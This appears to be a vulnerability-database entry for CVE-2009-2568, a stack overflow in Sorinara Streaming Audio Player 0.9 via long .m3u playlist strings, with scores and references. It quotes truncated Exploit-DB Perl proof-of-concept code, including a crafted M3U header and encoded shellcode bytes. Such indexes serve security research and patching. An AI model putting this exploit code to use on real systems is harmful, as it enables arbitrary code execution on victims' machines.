CVE-2009-2568
published 2009-07-22CVE-2009-2568: Stack-based buffer overflow in Sorinara Streaming Audio Player (SAP) 0.9 allows remote attackers to execute arbitrary code via a long string in a playlist…
PriorityP341critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.18%
92.6th percentile
Stack-based buffer overflow in Sorinara Streaming Audio Player (SAP) 0.9 allows remote attackers to execute arbitrary code via a long string in a playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sorinara | streaming_audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-05-05
CVE-2009-2568 Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)
Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS
#
# FIGUIG OwnZ !!!
#
# Streaming Audio Player 0.9 (.M3U File) Local Buffer Overflow PoC
#
#Olly Registers
#EAX 00197D20
#ECX 0000020E
#EDX 00126F84
#EBX 00193DAF
#ESP 001270B8
#EBP 7C81391C kernel32.GetFullPathNameA
#ESI 00197D20
#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $e
Exploit-DB
Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow
exploitdb·2009-05-05
CVE-2009-2568 Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow
Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow
---
#!/usr/bin/perl
# Streaming Audio Player 0.9 (.M3U File) Local Stack Core Exploit
# Credit : http://www.milw0rm.com/exploits/8617 cyber-zone
# By Stack
# Tested On WinSp2 En / FR
use strict;
use warnings;
my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x68\x74\x74\x70\x3A\x2F\x2F";
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/8617http://www.exploit-db.com/exploits/8620http://www.securityfocus.com/bid/34842https://exchange.xforce.ibmcloud.com/vulnerabilities/50339http://www.exploit-db.com/exploits/8617http://www.exploit-db.com/exploits/8620http://www.securityfocus.com/bid/34842https://exchange.xforce.ibmcloud.com/vulnerabilities/50339
2009-07-22
Published